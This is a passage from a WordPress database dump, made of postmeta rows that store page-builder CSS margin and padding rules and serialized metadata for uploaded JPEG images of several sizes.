!important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35704,5233,'_wpb_shortcodes_custom_css_updated','1'),
(35705,5234,'_wpb_post_custom_layout','default'),
(35706,5234,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692141731943{margin-top: -15px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35707,5234,'_wpb_shortcodes_custom_css_updated','1'),
(35708,5235,'_wpb_post_custom_layout','default'),
(35709,5235,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692141731943{margin-top: -15px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35710,5235,'_wpb_shortcodes_custom_css_updated','1'),
(35711,5237,'_wpb_post_custom_layout','default'),
(35712,5237,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692141731943{margin-top: -15px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35713,5237,'_wpb_shortcodes_custom_css_updated','1'),
(35714,5267,'_wp_attached_file','2023/08/162298019_1883841675127522_2570662785891038901_o.jpg'),
(35715,5267,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1463;s:4:\"file\";s:60:\"2023/08/162298019_1883841675127522_2570662785891038901_o.jpg\";s:8:\"filesize\";i:240732;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"162298019_1883841675127522_2570662785891038901_o-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13196;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"162298019_1883841675127522_2570662785891038901_o-1024x732.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:732;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78633;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"162298019_1883841675127522_2570662785891038901_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6382;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"162298019_1883841675127522_2570662785891038901_o-768x549.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:549;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50618;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"162298019_1883841675127522_2570662785891038901_o-1536x1097.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1097;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:143100;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:60:\"162298019_1883841675127522_2570662785891038901_o-500x357.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:357;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27267;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:60:\"162298019_1883841675127522_2570662785891038901_o-800x571.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:571;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53630;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:61:\"162298019_1883841675127522_2570662785891038901_o-1280x914.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:914;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108565;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:62:\"162298019_1883841675127522_2570662785891038901_o-1920x1372.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1372;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:199302;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(35739,5299,'_wp_attached_file','2023/08/main_u7.jpg'),
(35740,5299,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:375;s:4:\"file\";s:19:\"2023/08/main_u7.jpg\";s:8:\"filesize\";i:380779;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"main_u7-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7834;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"main_u7-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52673;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"main_u7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6702;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"main_u7-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33848;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:19:\"main_u7-500x125.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17288;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:19:\"main_u7-800x200.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36225;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:20:\"main_u7-1280x320.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75355;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(35741,5300,'_wp_attached_file','2023/08/main_u7-1.jpg'),
(35742,5300,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:375;s:4:\"file\";s:21:\"2023/08/main_u7-1.jpg\";s:8:\"filesize\";i:380779;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"main_u7-1-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7834;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"main_u7-1-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52673;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"main_u7-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6702;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"main_u7-1-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33848;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:21:\"main_u7-1-500x125.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17288;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:21:\"main_u7-1-800x200.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36225;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:22:\"main_u7-1-1280x320.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75355;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(35743,5301,'_wp_attached_file','2023/08/main_u7-2.jpg'),
(35744,5301,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:375;s:4:\"file\";s:21:\"2023/08/main_u7-2.jpg\";s:8:\"filesize\";i:380779;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"main_u7-2-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7834;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"main_u7-2-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52673;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"main_u7-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6702;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"main_u7-2-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33848;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:21:\"main_u7-2-500x125.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17288;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:21:\"main_u7-2-800x200.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36225;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:22:\"main_u7-2-1280x320.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75355;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(35746,5302,'_wp_attached_file','2023/08/main_u7-3.jpg'),
(35747,5302,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:375;s:4:\"file\";s:21:\"2023/08/main_u7-3.jpg\";s:8:\"filesize\";i:379124;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"main_u7-3-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7813;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"main_u7-3-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52494;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"main_u7-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6931;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"main_u7-3-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33804;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:21:\"main_u7-3-500x125.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17224;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:21:\"main_u7-3-800x200.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36221;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:22:\"main_u7-3-1280x320.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74954;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(35748,5303,'_wpb_post_custom_layout','default'),
(35749,5303,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px 